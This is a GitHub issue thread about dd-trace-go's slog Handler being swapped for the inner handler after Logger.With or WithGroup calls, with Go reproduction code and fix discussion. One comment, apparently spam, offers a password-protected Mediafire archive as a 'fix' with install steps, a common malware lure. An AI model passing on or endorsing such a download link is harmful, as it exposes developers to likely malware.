### ISSUE TITLE
[BUG] contrib/log/slog: log/slog.Handler is replaced by internal handler after Logger.With or Logger.WithGroup call

### ISSUE THREAD

**Issue by shota3506** [DataDog/dd-trace-go#2838]
**Version of dd-trace-go**

v1.67.0

**Describe what happened:**
dd-trace-go.v1/contrib/log/slog.Handler is replaced by internal handler after Logger.With or Logger.WithGroup call.

That's because it doesn't implement its own WithAttrs and WithGroup and just uses internal handler's method.
https://cs.opensource.google/go/go/+/refs/tags/go1.23.0:src/log/slog/logger.go;l=132

**Describe what you expected:**

slog.Logger keeps dd-trace-go.v1/contrib/log/slog.Handler after Logger.With or Logger.WithGroup call.

**Steps to reproduce the issue:**

You can confirm that the logger's Handler is replaced after logger.With or logger.WithGroup call.
```
package main

import (
	"fmt"
	"log/slog"
	"os"

	ddslog "gopkg.in/DataDog/dd-trace-go.v1/contrib/log/slog"
)

func main() {
	logger := slog.New(ddslog.NewJSONHandler(os.Stdout, &slog.HandlerOptions{}))

	fmt.Printf("before logger.With call: %T\n", logger.Handler())
	// before With call: *slog.handler

	logger = logger.With("key", "value")

	fmt.Printf("after logger.With call: %T\n", logger.Handler())
	// after With call: *slog.JSONHandler
}
```

**Additional environment details (Version of Go, Operating System, etc.):**

N/A

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by shota3506** [comment]
I addressed the issue in this https://github.com/DataDog/dd-trace-go/pull/2839

As I mentioned in a PR comment, I'm not sure how I should treat Logger.WithGroup call in this case.
I would like some advice on this.

**Comment by darccio** [comment]
@shota3506 Thanks for reaching out. We've reviewed it and we understand your concern. We'll check it soon.

**Comment by shota3506** [comment]
It might be a possible solution that the handler holds attributes and groups as its private fields and passes them to the inner handler at handler.Handle method. Although it will make the handler implementation complex and a little bit slow.
https://cs.opensource.google/go/x/exp/+/e7e105de:slog/handler.go;l=223-253

I thought ReplaceAttr resolves this issue, but it cannot modify the attribute's group as far as I checked
https://pkg.go.dev/golang.org/x/exp/slog#HandlerOptions
